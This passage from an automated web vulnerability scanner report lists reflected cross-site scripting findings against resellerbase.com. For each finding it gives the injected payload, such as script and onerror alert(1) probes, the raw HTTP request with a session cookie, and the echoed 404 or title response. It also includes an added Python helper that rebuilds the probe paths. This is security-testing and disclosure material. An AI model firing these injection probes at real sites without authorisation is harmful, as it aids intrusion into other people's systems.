The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b1135</title><img%20src%3da%20onerror%3dalert(1)>0633fcc96a6 was submitted in the REST URL parameter 2. This input was echoed as b1135</title><img src=a onerror=alert(1)>0633fcc96a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Browsers treat the content of the TITLE element as raw text rather than markup, so the payload first closes the element with </title> and then uses an IMG event handler (onerror fires because the image source does not load) to execute script without any user interaction.

Request

GET /tag/telephoneb1135</title><img%20src%3da%20onerror%3dalert(1)>0633fcc96a6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: telephoneb1135</title><img src=a onerror=alert(1)>0633fcc96a6</title>
...[SNIP]...

2.4434. http://www.resellerbase.com/tag/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 208ef<script>alert(1)</script>43fffa7c483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag208ef<script>alert(1)</script>43fffa7c483/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag208ef<script>alert(1)</script>43fffa7c483/themes/ was not found on this server.</p>
...[SNIP]...

2.4435. http://www.resellerbase.com/tag/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dddc<a>3d0248aaf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes7dddc<a>3d0248aaf0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes7dddc<a>3d0248aaf0/ was not found on this server.</p>
...[SNIP]...

2.4436. http://www.resellerbase.com/tag/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4051c<script>alert(1)</script>60fb7b2d50d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL (here including the query string) into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag/themes/?4051c<script>alert(1)</script>60fb7b2d50d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/?4051c<script>alert(1)</script>60fb7b2d50d=1 was not found on this server.</p>
...[SNIP]...

2.4437. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42154<script>alert(1)</script>775cf5e37a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag42154<script>alert(1)</script>775cf5e37a3/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag42154<script>alert(1)</script>775cf5e37a3/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4438. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b95ca<a>8c2fb45bece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themesb95ca<a>8c2fb45bece/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themesb95ca<a>8c2fb45bece/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4439. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32f98<a>4dfd8c99404 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos32f98<a>4dfd8c99404/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos32f98<a>4dfd8c99404/ was not found on this server.</p>
...[SNIP]...

2.4440. http://www.resellerbase.com/tag/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 332d3<script>alert(1)</script>405f428f184 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL (here including the query string) into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag/themes/kosmos/?332d3<script>alert(1)</script>405f428f184=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/?332d3<script>alert(1)</script>405f428f184=1 was not found on this server.</p>
...[SNIP]...

2.4441. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70689<script>alert(1)</script>1748e7bb198 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag70689<script>alert(1)</script>1748e7bb198/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag70689<script>alert(1)</script>1748e7bb198/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4442. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 621c3<a>ab6a65fd8f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. A natural first check is to resubmit, at this path position, the <script> probe that the same 404 template echoed verbatim in the first path segment (2.4441), and to compare the two responses for signs of filtering.

Request

GET /tag/themes621c3<a>ab6a65fd8f1/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes621c3<a>ab6a65fd8f1/kosmos/images/ was not found on this server.</p>
...[SNIP]...
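How the report names its injection points, and how its confidence levels relate to what came back, as an added example (Python; not code from the report or from the target site). "REST URL parameter N" means the probe was appended to the N-th path segment, and "name of an arbitrarily supplied request parameter" means the probe became the name of a new query-string parameter with the value 1. The grading rule reconstructs the report's own wording (an executable payload echoed verbatim is Certain, a harmless tag echoed verbatim is Firm, no verbatim echo is no finding); the request paths are rebuilt from findings 2.4440 to 2.4442 above, and the response fragments are constructed here.

```python
"""Rebuild the report's probe requests and grade what comes back.

Added example, not part of the scanner report or of the target site.
"REST URL parameter N": probe appended to the N-th path segment.
"name of an arbitrarily supplied request parameter": probe used as the
name of a new query parameter with value 1.
Grading reconstructs the report's wording: executable payload echoed
verbatim -> "Certain"; harmless tag echoed verbatim -> "Firm"; no
verbatim echo -> "None". All response fragments below are constructed.
"""
import html
import re
from urllib.parse import quote

# A probe counts as executable if it carries a <script> tag or an on* event handler.
EXECUTABLE = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def inject_segment(path: str, n: int, probe: str) -> str:
    """Append `probe` to the n-th (1-based) non-empty path segment."""
    segments = path.split("/")                     # "/tag/themes/" -> ["", "tag", "themes", ""]
    named = [i for i, s in enumerate(segments) if s]
    if n < 1 or n > len(named):
        raise ValueError(f"path has {len(named)} segments, there is no parameter {n}")
    segments[named[n - 1]] += probe
    return "/".join(segments)


def inject_param_name(path: str, probe: str) -> str:
    """Use `probe` as the name of a new query-string parameter, as in 2.4440."""
    return f"{path}?{probe}=1"


def encode_probe(probe: str) -> str:
    """Encode a probe the way the report's request lines show it.

    The scanner percent-encoded spaces and '=' but sent '<', '>', '(' and
    ')' raw. Whether an encoded form is reflected too is a manual check.
    """
    return quote(probe, safe="<>()")


def grade(probe: str, body: str) -> str:
    """Map a reflection to the report's confidence wording."""
    if probe not in body:
        return "None"                              # encoded or filtered: no verbatim reflection
    return "Certain" if EXECUTABLE.search(probe) else "Firm"


if __name__ == "__main__":
    base = "/tag/themes/kosmos/images/"
    # Constructed from the 404 snippets of findings 2.4441 and 2.4442.
    observations = [
        (1, "70689<script>alert(1)</script>1748e7bb198"),
        (2, "621c3<a>ab6a65fd8f1"),
    ]
    for n, probe in observations:
        wire_path = inject_segment(base, n, encode_probe(probe))   # what goes on the request line
        body = f"<p>The requested URL {inject_segment(base, n, probe)} was not found on this server.</p>"
        print(f"GET {wire_path} -> {grade(probe, body)}")
    # The same <a> probe after htmlspecialchars()-style encoding on the server side.
    escaped = html.escape("621c3<a>ab6a65fd8f1")
    print(f"encoded reflection -> {grade('621c3<a>ab6a65fd8f1', f'<p>{escaped}</p>')}")
```

The rebuilt paths match the request lines in the findings exactly, which is the quickest way to check which path segment a "REST URL parameter N" label refers to before retesting it by hand. For a Firm finding, the manual follow-up is the <script> probe at the same position and then an event-handler tag, as the 0.gif findings later in this report do.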

2.4443. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85653<a>c3a1ada77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos85653<a>c3a1ada77/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos85653<a>c3a1ada77/images/ was not found on this server.</p>
...[SNIP]...

2.4444. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dfd04<a>d2b98a93a8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/imagesdfd04<a>d2b98a93a8d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/imagesdfd04<a>d2b98a93a8d/ was not found on this server.</p>
...[SNIP]...

2.4445. http://www.resellerbase.com/tag/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f576<script>alert(1)</script>03e1c27e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/?6f576<script>alert(1)</script>03e1c27e89=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/?6f576<script>alert(1)</script>03e1c27e89=1 was not found on this server.</p>
...[SNIP]...

2.4446. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bb68<script>alert(1)</script>75e5cb99088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8bb68<script>alert(1)</script>75e5cb99088/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8bb68<script>alert(1)</script>75e5cb99088/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4447. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6dd77<a>df9039f0777 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes6dd77<a>df9039f0777/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes6dd77<a>df9039f0777/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4448. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b447d<a>c09739749e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmosb447d<a>c09739749e8/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmosb447d<a>c09739749e8/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4449. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0789<a>1720c956a24 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/imagesc0789<a>1720c956a24/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/imagesc0789<a>1720c956a24/rating/ was not found on this server.</p>
...[SNIP]...

2.4450. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ccae<a>7d884378ca2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

